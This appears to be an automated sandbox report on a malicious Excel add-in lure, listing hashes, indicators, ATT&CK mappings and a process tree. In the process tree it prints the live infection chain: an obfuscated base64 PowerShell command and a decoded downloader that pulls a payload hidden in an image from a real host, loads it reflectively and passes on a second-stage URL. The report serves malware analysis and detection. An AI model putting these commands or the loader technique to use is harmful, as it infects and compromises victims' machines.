c4c24eb056243059da37e882d660db6e775af54b7ce316a3ade90605e108ba91

General

Target

#Orden de Compra 20181.xlam
Size

664KB
MD5

da934aec1578872bae77e7b1817d873b
SHA1

5d34963d15fe717916c213f96effdb49cb8058fb
SHA256

c4c24eb056243059da37e882d660db6e775af54b7ce316a3ade90605e108ba91
SHA512

3b62dfacee6d85607801ef73468a8795663bc30717a6d099d12b7296adaf7d6ab59a86dce18bf06258fef4165ce5cda96b2d947e9364914dd2baeef6aa40c936
SSDEEP

12288:MXZ4V1mw2Q35FGfY7oNnitgONX4tx6hqmdMWj7hHY3YTWjGL0nDic9GL:mQ1mw2Ywfzit5NX4mheAK38L+DQL

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129

exe.dropper

https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	1720	EQNEDT32.EXE
6	2896	powershell.exe
8	2896	powershell.exe
10	2896	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1720	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1176	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2916	powershell.exe
2896	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	2896	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1176	EXCEL.EXE
1176	EXCEL.EXE
1176	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1720 wrote to memory of 2152	1720	EQNEDT32.EXE	30
PID 1720 wrote to memory of 2152	1720	EQNEDT32.EXE	30
PID 1720 wrote to memory of 2152	1720	EQNEDT32.EXE	30
PID 1720 wrote to memory of 2152	1720	EQNEDT32.EXE	30
PID 2152 wrote to memory of 2916	2152	WScript.exe	32
PID 2152 wrote to memory of 2916	2152	WScript.exe	32
PID 2152 wrote to memory of 2916	2152	WScript.exe	32
PID 2152 wrote to memory of 2916	2152	WScript.exe	32
PID 2916 wrote to memory of 2896	2916	powershell.exe	36
PID 2916 wrote to memory of 2896	2916	powershell.exe	36
PID 2916 wrote to memory of 2896	2916	powershell.exe	36
PID 2916 wrote to memory of 2896	2916	powershell.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\#Orden de Compra 20181.xlam"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1176

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1720
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\oreegen.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2152
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#VQBy#@$#Gw#@$#I#@$##@$#9#@$#C#@$##@$#JwBo#@$#HQ#@$#d#@$#Bw#@$#HM#@$#Og#@$#v#@$#C8#@$#dQBw#@$#Gw#@$#bwBh#@$#GQ#@$#Z#@$#Bl#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBu#@$#HM#@$#LgBj#@$#G8#@$#bQ#@$#u#@$#GI#@$#cg#@$#v#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBz#@$#C8#@$#M#@$##@$#w#@$#DQ#@$#Lw#@$#1#@$#DU#@$#OQ#@$#v#@$#DU#@$#MQ#@$#w#@$#C8#@$#bwBy#@$#Gk#@$#ZwBp#@$#G4#@$#YQBs#@$#C8#@$#cgB1#@$#G0#@$#c#@$#Bf#@$#H#@$##@$#cgBp#@$#HY#@$#YQB0#@$#GU#@$#LgBq#@$#H#@$##@$#Zw#@$#/#@$#DE#@$#Ng#@$#5#@$#D#@$##@$#NQ#@$#w#@$#DQ#@$#MQ#@$#y#@$#Dk#@$#Jw#@$#7#@$#CQ#@$#dwBl#@$#GI#@$#QwBs#@$#Gk#@$#ZQBu#@$#HQ#@$#I#@$##@$#9#@$#C#@$##@$#TgBl#@$#Hc#@$#LQBP#@$#GI#@$#agBl#@$#GM#@$#d#@$##@$#g#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#TgBl#@$#HQ#@$#LgBX#@$#GU#@$#YgBD#@$#Gw#@$#aQBl#@$#G4#@$#d#@$##@$#7#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$##@$#k#@$#Hc#@$#ZQBi#@$#EM#@$#b#@$#Bp#@$#GU#@$#bgB0#@$#C4#@$#R#@$#Bv#@$#Hc#@$#bgBs#@$#G8#@$#YQBk#@$#EQ#@$#YQB0#@$#GE#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBV#@$#HI#@$#b#@$##@$#p#@$#Ds#@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#EU#@$#bgBj#@$#G8#@$#Z#@$#Bp#@$#G4#@$#ZwBd#@$#Do#@$#OgBV#@$#FQ#@$#Rg#@$#4#@$#C4#@$#RwBl#@$#HQ#@$#UwB0#@$#HI#@$#aQBu#@$#Gc#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBC#@$#Hk#@$#d#@$#Bl#@$#HM#@$#KQ#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBT#@$#FQ#@$#QQBS#@$#FQ#@$#Pg#@$#+#@$#Cc#@$#Ow#@$#k#@$#GU#@$#bgBk#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBF#@$#E4#@$#R#@$##@$#+#@$#D4#@$#Jw#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#D0#@$#I#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBU#@$#GU#@$#e#@$#B0#@$#C4#@$#SQBu#@$#GQ#@$#ZQB4#@$#E8#@$#Zg#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#KQ#@$#7#@$#CQ#@$#ZQBu#@$#GQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#TwBm#@$#Cg#@$#J#@$#Bl#@$#G4#@$#Z#@$#BG#@$#Gw#@$#YQBn#@$#Ck#@$#Ow#@$#k#@$#HM#@$#d#@$#Bh#@$#HI#@$#d#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#ZQ#@$#g#@$#D#@$##@$#I#@$##@$#t#@$#GE#@$#bgBk#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#d#@$##@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#Cs#@$#PQ#@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#LgBM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#7#@$#CQ#@$#YgBh#@$#HM#@$#ZQ#@$#2#@$#DQ#@$#T#@$#Bl#@$#G4#@$#ZwB0#@$#Gg#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Ds#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBT#@$#HU#@$#YgBz#@$#HQ#@$#cgBp#@$#G4#@$#Zw#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#s#@$#C#@$##@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#p#@$#Ds#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#QwBv#@$#G4#@$#dgBl#@$#HI#@$#d#@$#Bd#@$#Do#@$#OgBG#@$#HI#@$#bwBt#@$#EI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#FM#@$#d#@$#By#@$#Gk#@$#bgBn#@$#Cg#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#Ck#@$#Ow#@$#k#@$#Gw#@$#bwBh#@$#GQ#@$#ZQBk#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQ#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#UgBl#@$#GY#@$#b#@$#Bl#@$#GM#@$#d#@$#Bp#@$#G8#@$#bg#@$#u#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQBd#@$#Do#@$#OgBM#@$#G8#@$#YQBk#@$#Cg#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#p#@$#Ds#@$#J#@$#B0#@$#Hk#@$#c#@$#Bl#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#b#@$#Bv#@$#GE#@$#Z#@$#Bl#@$#GQ#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#C4#@$#RwBl#@$#HQ#@$#V#@$#B5#@$#H#@$##@$#ZQ#@$#o#@$#Cc#@$#RgBp#@$#GI#@$#ZQBy#@$#C4#@$#S#@$#Bv#@$#G0#@$#ZQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#G0#@$#ZQB0#@$#Gg#@$#bwBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#d#@$#B5#@$#H#@$##@$#ZQ#@$#u#@$#Ec#@$#ZQB0#@$#E0#@$#ZQB0#@$#Gg#@$#bwBk#@$#Cg#@$#JwBW#@$#EE#@$#SQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#GE#@$#cgBn#@$#HU#@$#bQBl#@$#G4#@$#d#@$#Bz#@$#C#@$##@$#PQ#@$#g#@$#Cw#@$#K#@$##@$#n#@$#HQ#@$#e#@$#B0#@$#C4#@$#N#@$##@$#2#@$#GU#@$#cwBh#@$#GI#@$#MgBh#@$#G0#@$#YQBw#@$#GE#@$#Lw#@$#0#@$#DI#@$#Lg#@$#w#@$#DI#@$#MQ#@$#u#@$#Dg#@$#Nw#@$#x#@$#C4#@$#NQ#@$#5#@$#DE#@$#Lw#@$#v#@$#Do#@$#c#@$#B0#@$#HQ#@$#a#@$##@$#n#@$#Ck#@$#Ow#@$#k#@$#G0#@$#ZQB0#@$#Gg#@$#bwBk#@$#C4#@$#SQBu#@$#HY#@$#bwBr#@$#GU#@$#K#@$##@$#k#@$#G4#@$#dQBs#@$#Gw#@$#L#@$##@$#g#@$#CQ#@$#YQBy#@$#Gc#@$#dQBt#@$#GU#@$#bgB0#@$#HM#@$#KQ#@$#=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('#@$#','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2916
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.46esab2amapa/42.021.871.591//:ptth');$method.Invoke($null, $arguments)"
      4⤵
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6341e39e9842fe20f495e1f11b2d0bde

SHA1
7125eaf62e2806603fce86bae1842566d541195a

SHA256
a14c002140957b84ef09167dc2d964a1634751c5431d6ef8d7e1586c93d99f51

SHA512
1e9b7b3a57e866b600e9c0217f64900cf55f7cc8af659d52c96b1dbb0f237ad258c2b04a3b39c7886da34af4be95b78ef6eadbc73458ef2d4a47ab38030bd9ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF4AD.tmp

Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF6C3.tmp

Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4SUZ64DMDPY77CJ8IW39.temp

Filesize
7KB

MD5
e0b8a8aa7b8d124ade202d29fc95a7db

SHA1
1c0a2b4355c0449ccbef482428c3b1b08631efc3

SHA256
5220ef1651e96713659a78f8cf76dfc4563ed3c2524e5165ba69d73cc938523c

SHA512
f5c987f96667b4f3487321e251fc69411eaa9d3d0c7c57913e4fa80ccd803f61040a71b46a5a45022da81b82a267193aeb77f2ec2636ff1dd7b42ec8f9f1b76a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
e0b8a8aa7b8d124ade202d29fc95a7db

SHA1
1c0a2b4355c0449ccbef482428c3b1b08631efc3

SHA256
5220ef1651e96713659a78f8cf76dfc4563ed3c2524e5165ba69d73cc938523c

SHA512
f5c987f96667b4f3487321e251fc69411eaa9d3d0c7c57913e4fa80ccd803f61040a71b46a5a45022da81b82a267193aeb77f2ec2636ff1dd7b42ec8f9f1b76a

Download Submit
C:\Users\Admin\AppData\Roaming\oreegen.vbs

Filesize
230KB

MD5
dbfd1575e0be01195aed9cc6a14f0fd6

SHA1
2874912d44a6c6cf4d0edd8a022c6e6e6229f095

SHA256
dc58edab1b0210c03517739ec1ab2a4ca7d85b0d0a1b43e2edee9ba4b388ea02

SHA512
5167572dc53673ca62247fe5570e88e636ad91e3215ab2c0a6e3bef170c7b0105437af9a25e19388e0c0f71a631238570f42725ef26775b850c1bdf4ea5be3a3

Download Submit
C:\Users\Admin\AppData\Roaming\oreegen.vbs

Filesize
230KB

MD5
dbfd1575e0be01195aed9cc6a14f0fd6

SHA1
2874912d44a6c6cf4d0edd8a022c6e6e6229f095

SHA256
dc58edab1b0210c03517739ec1ab2a4ca7d85b0d0a1b43e2edee9ba4b388ea02

SHA512
5167572dc53673ca62247fe5570e88e636ad91e3215ab2c0a6e3bef170c7b0105437af9a25e19388e0c0f71a631238570f42725ef26775b850c1bdf4ea5be3a3

Download Submit
memory/1176-53-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1176-54-0x000000007365D000-0x0000000073668000-memory.dmp

Filesize
44KB

Download
memory/1176-155-0x000000007365D000-0x0000000073668000-memory.dmp

Filesize
44KB

Download
memory/1176-154-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1176-68-0x000000007365D000-0x0000000073668000-memory.dmp

Filesize
44KB

Download
memory/2896-75-0x000000006C130000-0x000000006C6DB000-memory.dmp

Filesize
5.7MB

Download
memory/2896-76-0x00000000027F0000-0x0000000002830000-memory.dmp

Filesize
256KB

Download
memory/2896-77-0x000000006C130000-0x000000006C6DB000-memory.dmp

Filesize
5.7MB

Download
memory/2896-78-0x00000000027F0000-0x0000000002830000-memory.dmp

Filesize
256KB

Download
memory/2896-151-0x000000006C130000-0x000000006C6DB000-memory.dmp

Filesize
5.7MB

Download
memory/2916-69-0x0000000002670000-0x00000000026B0000-memory.dmp

Filesize
256KB

Download
memory/2916-97-0x000000006C130000-0x000000006C6DB000-memory.dmp

Filesize
5.7MB

Download
memory/2916-67-0x0000000002670000-0x00000000026B0000-memory.dmp

Filesize
256KB

Download
memory/2916-66-0x000000006C130000-0x000000006C6DB000-memory.dmp

Filesize
5.7MB

Download
memory/2916-152-0x000000006C130000-0x000000006C6DB000-memory.dmp

Filesize
5.7MB

Download
memory/2916-65-0x000000006C130000-0x000000006C6DB000-memory.dmp

Filesize
5.7MB

Download
memory/2916-64-0x000000006C130000-0x000000006C6DB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing